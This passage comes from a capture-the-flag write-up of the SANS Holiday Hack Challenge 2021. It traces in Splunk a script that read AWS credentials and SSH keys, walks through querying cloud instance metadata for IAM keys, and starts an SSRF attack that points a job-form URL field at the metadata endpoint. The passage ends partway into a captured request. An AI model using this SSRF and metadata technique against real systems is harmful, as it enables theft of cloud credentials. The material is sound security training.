&lt;p&gt;We &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20ParentProcessId%3D6788&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;workload_pool=&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;display.events.fields=%5B%22host%22%2C%22source%22%2C%22process_path%22%2C%22CommandLine%22%2C%22sourcetype%22%2C%22ProcessId%22%2C%22ParentProcessGuid%22%2C%22ParentProcessId%22%2C%22ProcessGuid%22%2C%22ProcessID%22%2C%22parent_process_name%22%2C%22head_commit.url%22%2C%22repository.archive_url%22%2C%22repository.git_url%22%5D&amp;amp;sid=1640902517.1777"&gt;launch our search&lt;/a&gt;,
and see the following command, exfiltrating several files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;cat /home/eddie/.aws/credentials /home/eddie/.ssh/authorized_keys /home/eddie/.ssh/config /home/eddie/.ssh/eddie /home/eddie/.ssh/eddie.pub /home/eddie/.ssh/known_hosts
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Six different files were accessed by our suspicious process.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="task-8"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id48"&gt;Task 8&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Use Splunk and Sysmon Process creation data to identify the name of the
Bash script that accessed sensitive files and (likely) transmitted them to
a remote IP address.&lt;/blockquote&gt;
&lt;p&gt;If you remember, the Parent Process ID of our suspicious process was 6788.
Let's see the creation of this process:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 ProcessId=6788
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that the Parent Process ID of our target process is 6784." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_8_1.png" /&gt;
&lt;p&gt;&lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20ProcessId%3D6788&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;workload_pool=&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;display.events.fields=%5B%22host%22%2C%22source%22%2C%22process_path%22%2C%22CommandLine%22%2C%22sourcetype%22%2C%22ProcessId%22%2C%22ParentProcessGuid%22%2C%22ParentProcessId%22%2C%22ProcessGuid%22%2C%22ProcessID%22%2C%22parent_process_name%22%2C%22head_commit.url%22%2C%22repository.archive_url%22%2C%22repository.git_url%22%5D&amp;amp;sid=1640903533.1789"&gt;This search&lt;/a&gt;
shows us that the Parent Process ID of that process is 6784. So let's look for
its creation:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 ProcessId=6784
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that the Parent Process ID of our target process is 6783." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_8_2.png" /&gt;
&lt;p&gt;&lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20ProcessId%3D6784&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;workload_pool=&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;display.events.fields=%5B%22host%22%2C%22source%22%2C%22process_path%22%2C%22CommandLine%22%2C%22sourcetype%22%2C%22ProcessId%22%2C%22ParentProcessGuid%22%2C%22ParentProcessId%22%2C%22ProcessGuid%22%2C%22ProcessID%22%2C%22parent_process_name%22%2C%22head_commit.url%22%2C%22repository.archive_url%22%2C%22repository.git_url%22%5D&amp;amp;sid=1640903573.1792"&gt;This search&lt;/a&gt;
shows us that the Parent Process ID of &lt;em&gt;that&lt;/em&gt; process is 6783. So let's look
for &lt;em&gt;its&lt;/em&gt; creation:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 ProcessId=6783
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that this process launches a Bash script called preinstall.sh." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_8_3.png" /&gt;
&lt;p&gt;In &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20ProcessId%3D6783&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;workload_pool=&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;display.events.fields=%5B%22host%22%2C%22source%22%2C%22process_path%22%2C%22CommandLine%22%2C%22sourcetype%22%2C%22ProcessId%22%2C%22ParentProcessGuid%22%2C%22ParentProcessId%22%2C%22ProcessGuid%22%2C%22ProcessID%22%2C%22parent_process_name%22%2C%22head_commit.url%22%2C%22repository.archive_url%22%2C%22repository.git_url%22%5D&amp;amp;sid=1640903640.1794"&gt;this search&lt;/a&gt;,
we finally see that the command line launches the Bash script
&lt;code&gt;preinstall.sh&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;By completing the tasks, we get the following message:&lt;/p&gt;
&lt;blockquote&gt;
Thank you for helping Santa complete his investigation! Santa says you're a
whiz!&lt;/blockquote&gt;
&lt;p&gt;Santa called us a &lt;code&gt;whiz&lt;/code&gt;, how nice!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-10"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id49"&gt;Objective 10:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="noxious-o-d-or-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id50"&gt;Noxious O. D'or's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Noxious O. D'or is... I don't know, hanging in Jack Frost's restroom? It's
weird. Anyway, they need help regarding IMDS (Instance MetaData Service):&lt;/p&gt;
&lt;img alt="Noxious O. D'or. They're a troll, wearing a sweater with green, red, and white stripes, a dark green skirt, black shoes, and a turquoise beanie." class="align-center" src="/images/sans-christmas-challenge-2021/noxiousodor.png" /&gt;
&lt;p&gt;&lt;em&gt;Noxious O. D'or says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey, this is the executive restroom. Wasn't that door closed?&lt;/p&gt;
&lt;p&gt;I’m Noxious O’Dor. And I’ve gotta say, I think that Jack Frost is just
messed up.&lt;/p&gt;
&lt;p&gt;I mean, I'm no expert, but his effort to &amp;quot;win&amp;quot; against Santa by going
bigger and bolder seems bad.&lt;/p&gt;
&lt;p&gt;You know, I’m having some trouble with this IMDS exploration. I’m hoping
you can give me some help in solving it.&lt;/p&gt;
&lt;p&gt;If you do, I’ll be happy to trade you for some hints on SSRF! I’ve been
studying up on that and have some good ideas on how to attack it!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Looks like some trolls are not too happy with how old Jack is running things.
Let's give them a hand and open up the Cranberry Pi:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🎄🎄🎄 Prof. Petabyte here. In this lesson you'll continue to build your cloud asset skills,&lt;/p&gt;
&lt;p&gt;🎄🎄🎄 interacting with the Instance Metadata Service (IMDS) using curl.&lt;/p&gt;
&lt;p&gt;🎄🎄🎄&lt;/p&gt;
&lt;p&gt;🎄🎄🎄 If you get stuck, run 'hint' for assitance.&lt;/p&gt;
&lt;p&gt;🎄🎄🎄&lt;/p&gt;
&lt;p&gt;The Instance Metadata Service (IMDS) is a virtual server for cloud assets
at the IP address 169.254.169.254. Send a couple ping packets to the
server.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; ping -c &lt;span class="m"&gt;3&lt;/span&gt; &lt;span class="m"&gt;169&lt;/span&gt;.254.169.254
&lt;span class="go"&gt;PING 169.254.169.254 (169.254.169.254) 56(84) bytes of data.&lt;/span&gt;
&lt;span class="go"&gt;64 bytes from 169.254.169.254: icmp_seq=1 ttl=64 time=0.068 ms&lt;/span&gt;
&lt;span class="go"&gt;64 bytes from 169.254.169.254: icmp_seq=2 ttl=64 time=0.029 ms&lt;/span&gt;
&lt;span class="go"&gt;64 bytes from 169.254.169.254: icmp_seq=3 ttl=64 time=0.028 ms&lt;/span&gt;

&lt;span class="go"&gt;--- 169.254.169.254 ping statistics ---&lt;/span&gt;
&lt;span class="go"&gt;3 packets transmitted, 3 received, 0% packet loss, time 2056ms&lt;/span&gt;
&lt;span class="go"&gt;rtt min/avg/max/mdev = 0.028/0.041/0.068/0.018 ms&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;IMDS provides information about currently running virtual machine instances. You can use it
to manage and configure cloud nodes. IMDS is used by all major cloud providers.&lt;/p&gt;
&lt;p&gt;Developers can automate actions using IMDS. We'll interact with the server
using the cURL tool. Run 'curl &lt;a class="reference external" href="http://169.254.169.254"&gt;http://169.254.169.254&lt;/a&gt;' to access IMDS data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254
&lt;span class="go"&gt;latest&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
Different providers will have different formats for IMDS data. We're using
an AWS-compatible IMDS server that returns 'latest' as the default
response. Access the 'latest' endpoint. Run
'curl &lt;a class="reference external" href="http://169.254.169.254/latest"&gt;http://169.254.169.254/latest&lt;/a&gt;'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest
&lt;span class="go"&gt;dynamic&lt;/span&gt;
&lt;span class="go"&gt;meta-data&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
IMDS returns two new endpoints: dynamic and meta-data. Let's start with the
dynamic endpoint, which provides information about the instance itself.
Repeat the request to access the dynamic endpoint:
'curl &lt;a class="reference external" href="http://169.254.169.254/latest/dynamic"&gt;http://169.254.169.254/latest/dynamic&lt;/a&gt;'.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/dynamic
&lt;span class="go"&gt;fws/instance-monitoring&lt;/span&gt;
&lt;span class="go"&gt;instance-identity/document&lt;/span&gt;
&lt;span class="go"&gt;instance-identity/pkcs7&lt;/span&gt;
&lt;span class="go"&gt;instance-identity/signature&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
The instance identity document can be used by developers to understand the
instance details. Repeat the request, this time requesting the
instance-identity/document resource:
'curl &lt;a class="reference external" href="http://169.254.169.254/latest/dynamic/instance-identity/document"&gt;http://169.254.169.254/latest/dynamic/instance-identity/document&lt;/a&gt;'.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/dynamic/instance-identity/document
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;accountId&amp;quot;: &amp;quot;PCRVQVHN4S0L4V2TE&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;imageId&amp;quot;: &amp;quot;ami-0b69ea66ff7391e80&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;availabilityZone&amp;quot;: &amp;quot;np-north-1f&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;ramdiskId&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;kernelId&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;devpayProductCodes&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;marketplaceProductCodes&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;version&amp;quot;: &amp;quot;2017-09-30&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;privateIp&amp;quot;: &amp;quot;10.0.7.10&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;billingProducts&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;instanceId&amp;quot;: &amp;quot;i-1234567890abcdef0&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;pendingTime&amp;quot;: &amp;quot;2021-12-01T07:02:24Z&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;architecture&amp;quot;: &amp;quot;x86_64&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;instanceType&amp;quot;: &amp;quot;m4.xlarge&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;region&amp;quot;: &amp;quot;np-north-1&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
Much of the data retrieved from IMDS will be returned in JavaScript Object
Notation (JSON) format. Piping the output to 'jq' will make the content
easier to read.  Re-run the previous command, sending the output to JQ:
'curl &lt;a class="reference external" href="http://169.254.169.254/latest/dynamic/instance-identity/document"&gt;http://169.254.169.254/latest/dynamic/instance-identity/document&lt;/a&gt; | jq'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/dynamic/instance-identity/document &lt;span class="p"&gt;|&lt;/span&gt; q  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
&lt;span class="go"&gt;                                 Dload  Upload   Total   Spent    Left  Speed&lt;/span&gt;
&lt;span class="go"&gt;100   451  100   451    0     0   440k      0 --:--:-- --:--:-- --:--:--  440k&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;accountId&amp;quot;: &amp;quot;PCRVQVHN4S0L4V2TE&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;imageId&amp;quot;: &amp;quot;ami-0b69ea66ff7391e80&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;availabilityZone&amp;quot;: &amp;quot;np-north-1f&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;ramdiskId&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;kernelId&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;devpayProductCodes&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;marketplaceProductCodes&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;version&amp;quot;: &amp;quot;2017-09-30&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;privateIp&amp;quot;: &amp;quot;10.0.7.10&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;billingProducts&amp;quot;: null,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;instanceId&amp;quot;: &amp;quot;i-1234567890abcdef0&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;pendingTime&amp;quot;: &amp;quot;2021-12-01T07:02:24Z&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;architecture&amp;quot;: &amp;quot;x86_64&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;instanceType&amp;quot;: &amp;quot;m4.xlarge&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;  &amp;quot;region&amp;quot;: &amp;quot;np-north-1&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, doesn't change much without the syntax coloring done in the Cranberry Pi,
sorry about that.&lt;/p&gt;
&lt;blockquote&gt;
In addition to dynamic parameters set at launch, IMDS offers metadata about
the instance as well. Examine the metadata elements available:
'curl &lt;a class="reference external" href="http://169.254.169.254/latest/meta-data"&gt;http://169.254.169.254/latest/meta-data&lt;/a&gt;'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/meta-data
&lt;span class="go"&gt;ami-id&lt;/span&gt;
&lt;span class="go"&gt;ami-launch-index&lt;/span&gt;
&lt;span class="go"&gt;ami-manifest-path&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;public-hostname&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;public-ipv4&lt;/span&gt;
&lt;span class="go"&gt;public-keys/0/openssh-key&lt;/span&gt;
&lt;span class="go"&gt;reservation-id&lt;/span&gt;
&lt;span class="go"&gt;security-groups&lt;/span&gt;
&lt;span class="go"&gt;services/domain&lt;/span&gt;
&lt;span class="go"&gt;services/partition&lt;/span&gt;
&lt;span class="go"&gt;spot/instance-action&lt;/span&gt;
&lt;span class="go"&gt;spot/termination-time&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
By accessing the metadata elements, a developer can interrogate information
about the system.  Take a look at the public-hostname element:
'curl &lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/public-hostname"&gt;http://169.254.169.254/latest/meta-data/public-hostname&lt;/a&gt;'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/meta-data/public-hostname
&lt;span class="go"&gt;ec2-192-0-2-54.compute-1.amazonaws.com&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
Many of the data elements returned won't include a trailing newline, which
causes the response to blend into the prompt. Re-run the prior command,
adding '; echo' to the end of the command. This will add a new line
character to the response.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/meta-data/public-hostname&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt;
&lt;span class="go"&gt;ec2-192-0-2-54.compute-1.amazonaws.com&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
There is a whole lot of information that can be retrieved from the IMDS
server. Even AWS Identity and Access Management (IAM) credentials! Request
the endpoint '&lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/iam/security-credentials"&gt;http://169.254.169.254/latest/meta-data/iam/security-credentials&lt;/a&gt;'
to see the instance IAM role.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/meta-data/iam/security-credentials
&lt;span class="go"&gt;elfu-deploy-role&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
Once you know the role name, you can request the AWS keys associated with
the role. Request the endpoint '&lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy-role"&gt;http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy-role&lt;/a&gt;'
to get the instance AWS keys.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy-role
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Code&amp;quot;: &amp;quot;Success&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;LastUpdated&amp;quot;: &amp;quot;2021-12-02T18:50:40Z&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Type&amp;quot;: &amp;quot;AWS-HMAC&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;AccessKeyId&amp;quot;: &amp;quot;AKIA5HMBSK1SYXYTOXX6&amp;quot;,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;        &amp;quot;SecretAccessKey&amp;quot;: &amp;quot;CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX&amp;quot;,&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;        &amp;quot;Token&amp;quot;: &amp;quot;NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Expiration&amp;quot;: &amp;quot;2026-12-02T18:50:40Z&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's remember these last two requests, they may come in handy (&lt;em&gt;wink wink
nudge nudge&lt;/em&gt;).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;So far, we've been interacting with the IMDS server using IMDSv1, which
does not require authentication. Optionally, AWS users can turn on IMDSv2
that requires authentication. This is more secure, but not on by default.&lt;/p&gt;
&lt;p&gt;For IMDSv2 access, you must request a token from the IMDS server using the
X-aws-ec2-metadata-token-ttl-seconds header to indicate how long you want
the token to be used for (between 1 and 21,600 secods).
Examine the contents of the 'gettoken.sh' script in the current directory
using 'cat'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; cat gettoken.sh
&lt;span class="go"&gt;TOKEN=`curl -X PUT &amp;quot;http://169.254.169.254/latest/api/token&amp;quot; -H &amp;quot;X-aws-ec2-metadata-token-ttl-seconds: 21600&amp;quot;`&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
This script will retrieve a token from the IMDS server and save it in the
environment variable TOKEN. Import it into your environment by running
'source gettoken.sh'.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; &lt;span class="nb"&gt;source&lt;/span&gt; gettoken.sh
&lt;span class="gp"&gt;  %&lt;/span&gt; Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
&lt;span class="go"&gt;                                 Dload  Upload   Total   Spent    Left  Speed&lt;/span&gt;
&lt;span class="go"&gt;100    44  100    44    0     0  44000      0 --:--:-- --:--:-- --:--:-- 44000&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
Now, the IMDS token value is stored in the environment variable TOKEN.
Examine the contents of the token by running 'echo $TOKEN'.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$ echo $&lt;/span&gt;TOKEN
&lt;span class="go"&gt;Uv38ByGCZU8WP18PmmIdcpVmx00QA3xNe7sEB9Hixkk=&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
With the IMDS token, you can make an IMDSv2 request by adding the
X-aws-ec2-metadata-token header to the curl request. Access the metadata
region information in an IMDSv2 request: 'curl -H &amp;quot;X-aws-ec2-metadata-token: $TOKEN&amp;quot; &lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/placement/region"&gt;http://169.254.169.254/latest/meta-data/placement/region&lt;/a&gt;'&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@52bd7db1db49:~$&lt;/span&gt; curl -H &lt;span class="s2"&gt;&amp;quot;X-aws-ec2-metadata-token: &lt;/span&gt;&lt;span class="nv"&gt;$TOKEN&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt; http://169.254.169.254/latest/meta-data/placement/region
&lt;span class="go"&gt;np-north-1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬
You've completed the lesson on Instance Metadata interaction.&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="now-hiring"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id51"&gt;Now Hiring!&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're told to take a look at &lt;a class="reference external" href="https://apply.jackfrosttower.com/"&gt;Jack Frost's job application webapp&lt;/a&gt;.
Let's take a look at the form:&lt;/p&gt;
&lt;img alt="The job application form. There are several fields: name, email address, phone number, field of expertise, a resume upload button, a URL to our public NLBI report, and a text area for additional information." class="align-center" src="/images/sans-christmas-challenge-2021/apply_form_empty.png" /&gt;
&lt;p&gt;The most interesting field in this form is the URL to the NLBI report. Indeed,
if the application is vulnerable to &lt;a class="reference external" href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery"&gt;SSRF&lt;/a&gt;,
we could request a sensitive URL, such as the &lt;em&gt;IMDS URL&lt;/em&gt; we learned about in
the last Cranberry Pi challenge.&lt;/p&gt;
&lt;p&gt;Let's try specifying the URL to get the role name of the instance,
&lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/iam/security-credentials"&gt;http://169.254.169.254/latest/meta-data/iam/security-credentials&lt;/a&gt;.&lt;/p&gt;
&lt;img alt="The same form as before, filled with bogus information. The name is set to useless (which is yours truly), and the URL is set to the one we just spoke about to get the role name of the instance." class="align-center" src="/images/sans-christmas-challenge-2021/apply_form_filled_out_role_name.png" /&gt;
&lt;img alt="The web application sends a success message, reading &amp;quot;Submission Accepted&amp;quot;, &amp;quot;Naughty list recipients rejoice!&amp;quot;, &amp;quot;We'll be in touch&amp;quot;. In the middle there seems to be an image, but it appears to be broken, and nothing is displayed by the browser." class="align-center" src="/images/sans-christmas-challenge-2021/apply_form_submission_accepted_role_name.png" /&gt;
&lt;p&gt;Our submission was accepted. But what's this? There seems to be a broken image
in the middle of the page. Let's check our Burp proxy history to see what's
the deal, yo!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/images/useless.jpg&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;apply.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/avif,image/webp,*/*&lt;/span&gt;
